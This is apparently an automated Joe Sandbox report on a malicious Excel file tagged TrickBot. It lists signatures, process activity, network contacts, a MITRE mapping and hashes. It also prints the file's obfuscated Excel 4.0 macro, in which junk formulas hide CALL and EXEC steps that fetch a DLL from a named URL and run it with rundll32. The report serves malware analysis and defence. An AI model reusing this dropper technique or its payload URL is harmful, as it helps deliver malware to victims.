
Analysis Report upload_dreport_1364433.xls

Overview

General Information

Sample Name: upload_dreport_1364433.xls
Analysis ID: 384202
MD5: 754118ba489515384b9607af8afb0818
SHA1: a16a7be15f0d55a3a1e8aa771752d2740cd7b0a6
SHA256: 9a8354e138e9a773581bb74e52e6e1a7dffb3fb0f6ec1859b4a4d7dc62421c97
Tags: rob47, SilentBuilder, TrickBot, xls

Detection

Hidden Macro 4.0
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2496 cmdline: rundll32 ..\hdoanal.sbl,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: upload_dreport_1364433.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x16637:$e1: Enable Editing
  • 0x16381:$e3: Enable editing
  • 0x16453:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview


Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: www.algostore.in
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 103.212.121.53:80
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CD8CA3A.emf
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.algostore.in
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: upload_dreport_1364433.xls, 79DE0000.0.dr | String found in binary or memory: http://www.algostore.in/algostoreold/printme.php
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4 | Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start U the decryption of the docum
Source: Document image extraction number: 2 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 | Screenshot OCR: Enable Content
Source: Document image extraction number: 4 | Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 8 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 ) Protected Vi
Source: Screenshot number: 8 | Screenshot OCR: Enable content" to perform Microsoft officd Decryption Core to start 18 ['the decryption of the doc
Found Excel 4.0 Macro with suspicious formulas
Source: upload_dreport_1364433.xls | Initial sample: CALL
Source: upload_dreport_1364433.xls | Initial sample: EXEC
Source: upload_dreport_1364433.xls | OLE indicator, VBA macros: true
Source: upload_dreport_1364433.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal60.expl.evad.winXLS@3/5@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCBC7.tmp
Source: upload_dreport_1364433.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\hdoanal.sbl,StartW
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting¹¹ | Path Interception | Process Injection¹ | Masquerading¹ | OS Credential Dumping | File and Directory Discovery¹ | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol¹ | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution²² | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools¹ | LSASS Memory | System Information Discovery² | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol¹ | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32¹ | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer¹ | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection¹ | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting¹¹ | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
algostore.in | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://www.algostore.in/algostoreold/printme.php | 0% | Virustotal |
http://www.algostore.in/algostoreold/printme.php | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
algostore.in | 103.212.121.53 | true | false | | unknown
www.algostore.in | unknown | unknown | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2139808790.0000000001DA7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2139654977.0000000001BC0000.00000002.00000001.sdmp | false | | high
http://www.algostore.in/algostoreold/printme.php | upload_dreport_1364433.xls, 79DE0000.0.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.212.121.53 | algostore.in | India | 133296 | WEBWERKS-AS-IN WebWerksIndiaPvtLtdIN | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 384202
Start date: 08.04.2021
Start time: 18:30:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: upload_dreport_1364433.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal60.expl.evad.winXLS@3/5@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: WEBWERKS-AS-IN WebWerksIndiaPvtLtdIN

Associated Sample Name / URL (Detection) | Context
• Scan-45679.exe (malicious) | 43.241.61.180
• FIR_Copy.exe (malicious) | 103.224.241.225
• Copy of Invoice 522967.xlsm (malicious) | 43.239.110.5
• Enquiries & PO.xls (malicious) | 103.102.234.200
• Purchase_Order.xls (malicious) | 103.102.234.200
• z2xQEFs54b.exe (malicious) | 150.242.140.16
• Tomd.htm (malicious) | 103.102.234.241
• SKMBT_C280190724010211.exe (malicious) | 103.102.234.241
• Swift copy.exe (malicious) | 103.224.241.225
• PO71109.EXE (malicious) | 103.102.234.253
• creoagent.dll (malicious) | 103.233.25.209
• creoagent.dll (malicious) | 103.233.25.209
• printouts of outstanding as of 01_20_2021.xlsm (malicious) | 103.11.153.223
• payment infirmation.exe (malicious) | 206.183.111.188
• User Credentials.doc (malicious) | 103.212.121.59
• E-Statement.exe (malicious) | 103.212.121.190
• CV_SrinivasaBabuAdhikari.pdf.exe (malicious) | 103.212.121.190
• STS CARGO SHIPMENT.exe (malicious) | 103.212.121.190
• HSBC Payment Advice.exe (malicious) | 103.212.121.190
• 990109.exe (malicious) | 150.242.140.16

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\A8DE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 80471
Entropy (8bit): 7.888931101044359
Encrypted: false
SSDEEP: 1536:ZSGOoKvmOwWNLLmrWGH3Wj1ZYzsoAeWRlMVGoIahaDHTU6hryF70Kie:ZSNrOOwW4rW23WJZYAog2sTU2yF70Kie
MD5: 551325FC9F0EF79919C4A8BD0786DBA2
SHA1: C84B11DDA1E4CA2AB035C45AD1233BB131ED26A4
SHA-256: EEB25E96C5A5908E5E9904C6320009E2DD73DBDEDCCF4734A5C92A9F84E1AE12
SHA-512: 96621D1E71EFB7D369B99023BFD27ACF4918E757A97130A0339CAEB5BDD384313BC90700E16D4B1EEB409BDE4330C8291FBD040064A3EA87083193A3F2404B38
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Apr 9 00:30:40 2021, atime=Fri Apr 9 00:30:40 2021, length=12288, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.48375076304261
Encrypted: false
SSDEEP: 12:85Q59gKLgXg/XAlCPCHaXtB8XzB/eMMX+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP8:850/XTd6jgfYeQSDv3qIrNru/
MD5: 0C1E0638A30653B168BF8AC4CC2E88F0
SHA1: 9D036BAE04E40BE1FD2D88911D93214F6875C761
SHA-256: 29B581BE59FF27F53C7A94C934567DE5D2E6F331CEADF08073D141D49FD95AD6
SHA-512: C7CC6AD9151820D0417CEBC51AB43DC82C8E439DB8A718156D12F175B254428BAD576CF4C84CA168387C3877EDA4135C78FC62AEE336AD1B22A2D43AC39889DE
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 119
Entropy (8bit): 4.657212536980188
Encrypted: false
SSDEEP: 3:oyBVomMIlPdwbIVtlPdwbmMIlPdwbv:dj6OPdV3PdWOPdm
MD5: 5BCEAE4B11BAD38798C24B8CFF42C07D
SHA1: CDDDD3F63123E108951D9F3134E4BC6C842319AB
SHA-256: 1FBB4753F83F300753566EF8AA2A0BD7F11B6351DB6CA28FEA3A108D5CD142AF
SHA-512: 671E76DF026E712FB8BCD2F6FF29FB15C907B25FB9E35648A9EE2ECB72F41B6230901DC86BE317E960E11C5FE950177000B8904C2168183EB6857334B147FD09
Malicious: false
Reputation: low
Preview: Desktop.LNK=0..[xls]..upload_dreport_1364433.LNK=0..upload_dreport_1364433.LNK=0..[xls]..upload_dreport_1364433.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\upload_dreport_1364433.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Fri Apr 9 00:30:40 2021, atime=Fri Apr 9 00:30:41 2021, length=104960, window=hide
Category: dropped
Size (bytes): 2148
Entropy (8bit): 4.519455902911819
Encrypted: false
SSDEEP: 48:8f/XT0jFOAQc51iQcVIQh2f/XT0jFOAQc51iQcVIQ/:8f/XojFOnclcVIQh2f/XojFOnclcVIQ/
MD5: E78545EC3C3C9F12D4BE705E4E13B0C1
SHA1: 27067EA319F261A7E793E399928081C1C7FF66F0
SHA-256: BCE3E4A56B85D2BEA1879279E75E0F38264B56623CB227925772CB5E85D0057D
SHA-512: 8B3C36F66A17FB9D19D7B877C0FE94D30FBD17BC97190AE18982A737400FFE58970C41D58B05BD93032134A7FFD2C2A49457C6C4B3F10426DC431AFAF2C991D4
Malicious: false
Reputation: low
C:\Users\user\Desktop\79DE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Applesoft BASIC program data, first line number 16
Category: dropped
Size (bytes): 137284
Entropy (8bit): 6.833991894188144
Encrypted: false
SSDEEP: 3072:tU8rmjAItyzElBIL6lECbgBGGP5xLm7TG2rTUKyF70Pi7W2aEf9SOPaEfGSOZ2Ub:G8rmjAItyzElBIL6lECbgBvP5Nm7TtUo
MD5: C2D040D8A5936A7ED8EE93496334ADF0
SHA1: 9E8779B14995606BE83A7628D4B8CB54D74B28AC
SHA-256: A71369313985D81851B4DBCD15E50A9F2E05934C98D1F6E1BE34848EF5843360
SHA-512: 9652FADBD536CDA80C3322E61FCB24917FA62B6966E8437BC5CDF6C09C5A1BBBCDC1876C9B52B222588296B21E555074A67AD11E9A8142396ACE5F547564F8ED
Malicious: false
Reputation: low

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 8 17:19:11 2021, Security: 0
Entropy (8bit): 3.194802926156192
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: upload_dreport_1364433.xls
File size: 281088
MD5: 754118ba489515384b9607af8afb0818
SHA1: a16a7be15f0d55a3a1e8aa771752d2740cd7b0a6
SHA256: 9a8354e138e9a773581bb74e52e6e1a7dffb3fb0f6ec1859b4a4d7dc62421c97
SHA512: a6fc3834f997ca328a1e2b85f40bb7a952a608044cba608bd62ce250f035f4d96f81a584a523b90d3ba39f6b5ae671d7b2e92c6b94a5713a1764046b4c75e1ce
SSDEEP: 6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5IZJK+flk99:2n99
                File Content Preview:........................>.......................#................................... ...!..."..................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "upload_dreport_1364433.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Last Saved By:5
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-04-08 16:19:11
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.335261663834
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.248866429231
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . i . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 269254
                General
                Stream Path:Book
                File Type:Applesoft BASIC program data, first line number 8
                Stream Size:269254
                Entropy:3.16227621583
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                "=ACOSH(8768687687)=ACOS(887687324345)=ASIN(543873524385)=ACOSH(4538354354)=ACOS(54345354345)=ASIN(54354323215216300000)=ACOSH(4535435483212210000)=ACOS(5.46863453535456E+26)=ASIN(4.21621642164261E+27)=ACOSH(45354354385783400000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(35435434852432200000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(35435434852432200000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=CALL(Docs3!BX32&Docs3!BS25&Docs3!BQ45&Docs3!BQ46,Docs3!BZ32&Docs3!CA33&Docs3!BY34&Docs3!CA35&Docs3!CA36,Docs3!CB32&Docs3!CB33,0,Docs3!BU14,Docs3!BZ22,0,0)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=Docs1!AU22()"
                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=EXEC(Docs3!BW41&Docs3!BW42&Docs3!BW43&Docs3!BW44&Docs3!BZ22&Docs3!BZ41&Docs3!CA41&Docs3!BZ42&Docs3!BZ43)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,
